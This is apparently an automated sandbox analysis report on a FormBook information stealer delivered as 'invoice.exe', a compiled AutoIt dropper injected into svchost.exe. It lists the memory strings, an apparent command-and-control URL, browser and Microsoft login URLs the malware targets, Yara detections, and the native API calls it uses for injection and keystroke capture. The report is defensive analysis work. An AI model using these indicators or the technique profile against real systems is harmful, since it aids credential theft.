65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: usnnduqerdgHbr.exe, 00000007.00000002.3576662143.000000000277B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kalomor.top
            Source: usnnduqerdgHbr.exe, 00000007.00000002.3576662143.000000000277B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kalomor.top/1i25/
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: at.exe, 00000003.00000002.3577269049.0000000004D0E000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.00000000036EE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: at.exe, 00000003.00000002.3577269049.000000000599E000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.000000000437E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf6
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: at.exe, 00000003.00000002.3575543840.0000000003581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: at.exe, 00000003.00000002.3575543840.000000000355F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: at.exe, 00000003.00000003.2146292439.000000000856E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: at.exe, 00000003.00000002.3577269049.0000000004858000.00000004.10000000.00040000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.0000000003238000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2261440991.0000000010C68000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: at.exe, 00000003.00000002.3577269049.000000000567A000.00000004.10000000.00040000.00000000.sdmp, at.exe, 00000003.00000002.3579233466.0000000006B40000.00000004.00000800.00020000.00000000.sdmp, usnnduqerdgHbr.exe, 00000007.00000002.3576985451.000000000405A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: at.exe, 00000003.00000003.2156135158.000000000858E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FF407C
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF427A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00FF427A
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FF407C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00FF407C
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE003A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00FE003A
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0100CB26 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0100CB26

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3576495613.0000000003730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3575236547.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1867193556.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3576582157.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3576662143.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1867580811.0000000003760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.3576480081.0000000002850000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1867970632.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\invoice.exeCode function: This is a third-party compiled AutoIt script.0_2_00F83B4C
            Source: invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: invoice.exe, 00000000.00000000.1707351548.0000000001034000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b4adfed2-6
            Source: invoice.exe, 00000000.00000000.1707351548.0000000001034000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_31bbf1df-f
            Source: invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c1aeed67-b
            Source: invoice.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer"memstr_5bdf353f-e
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: invoice.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C5B3 NtClose,1_2_0042C5B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974340 NtSetContextThread,1_2_03974340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974650 NtSuspendThread,1_2_03974650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtCreateSection,1_2_03972F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C60 NtCreateKey,1_2_03972C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973090 NtSetValueKey,1_2_03973090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D70 NtOpenThread,1_2_03973D70
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FEA279: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00FEA279
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FD8638 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00FD8638
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE5264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00FE5264
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F8E8000_2_00F8E800
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FADAF50_2_00FADAF5
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F8FE400_2_00F8FE40
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F8E0600_2_00F8E060
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F941400_2_00F94140
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA23450_2_00FA2345
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB64520_2_00FB6452
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB25AE0_2_00FB25AE
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_010004650_2_01000465
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA277A0_2_00FA277A
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F968410_2_00F96841
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB69C40_2_00FB69C4
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F989680_2_00F98968
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FE89320_2_00FE8932
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FDE9280_2_00FDE928
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_010008E20_2_010008E2
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB890F0_2_00FB890F
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FACCA10_2_00FACCA1
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB6F360_2_00FB6F36
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F970FE0_2_00F970FE
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F931900_2_00F93190
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F812870_2_00F81287
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FAF3590_2_00FAF359
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA33070_2_00FA3307
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F956800_2_00F95680
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA16040_2_00FA1604
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00F958C00_2_00F958C0
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA78130_2_00FA7813
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA1AF80_2_00FA1AF8
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FB9C350_2_00FB9C35
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_01007E0D0_2_01007E0D
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FABF260_2_00FABF26
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_00FA1F100_2_00FA1F10
            Source: C:\Users\user\Desktop\invoice.exeCode function: 0_2_0152EBE80_2_0152EBE8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004185731_2_00418573
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E0631_2_0040E063
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028C01_2_004028C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028BE1_2_004028BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031E01_2_004031E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011801_2_00401180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023E01_2_004023E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EBE31_2_0042EBE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402CF01_2_00402CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDC31_2_0040FDC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025A01_2_004025A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FDBA1_2_0040FDBA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041674F1_2_0041674F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004167531_2_00416753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FFE31_2_0040FFE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A003E61_2_03A003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E3F01_2_0394E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA3521_2_039FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C02C01_2_039C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E02741_2_039E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A001AA1_2_03A001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F41A21_2_039F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81CC1_2_039F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DA1181_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039301001_2_03930100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C81581_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D20001_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C01_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039647501_2_03964750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039407701_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C6E01_2_0395C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A005911_2_03A00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039405351_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EE4F61_2_039EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E44201_2_039E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F24461_2_039F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F6BD71_2_039F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB401_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA801_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0A9A61_2_03A0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A01_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039569621_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039268B81_2_039268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E8F01_2_0396E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394A8401_2_0394A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039428401_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BEFA01_2_039BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932FC81_2_03932FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960F301_2_03960F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E2F301_2_039E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03982F281_2_03982F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4F401_2_039B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952E901_2_03952E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FCE931_2_039FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEEDB1_2_039FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393AE0D1_2_0393AE0D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FEE261_2_039FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940E591_2_03940E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958DBF1_2_03958DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DCD1F1_2_039DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394AD001_2_0394AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E0CB51_2_039E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930CF21_2_03930CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940C001_2_03940C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0398739A1_2_0398739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F132D1_2_039F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392D34C1_2_0392D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039452A01_2_039452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395B2C01_2_0395B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395D2F01_2_0395D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E12ED1_2_039E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394B1B01_2_0394B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A0B16B1_2_03A0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392F1721_2_0392F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397516C1_2_0397516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EF0CC1_2_039EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039470C01_2_039470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F70E91_2_039F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF0E01_2_039FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF7B01_2_039FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F16CC1_2_039F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DD5B01_2_039DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F75711_2_039F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FF43F1_2_039FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039314601_2_03931460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395FB801_2_0395FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B5BF01_2_039B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397DBF91_2_0397DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FFB761_2_039FFB76
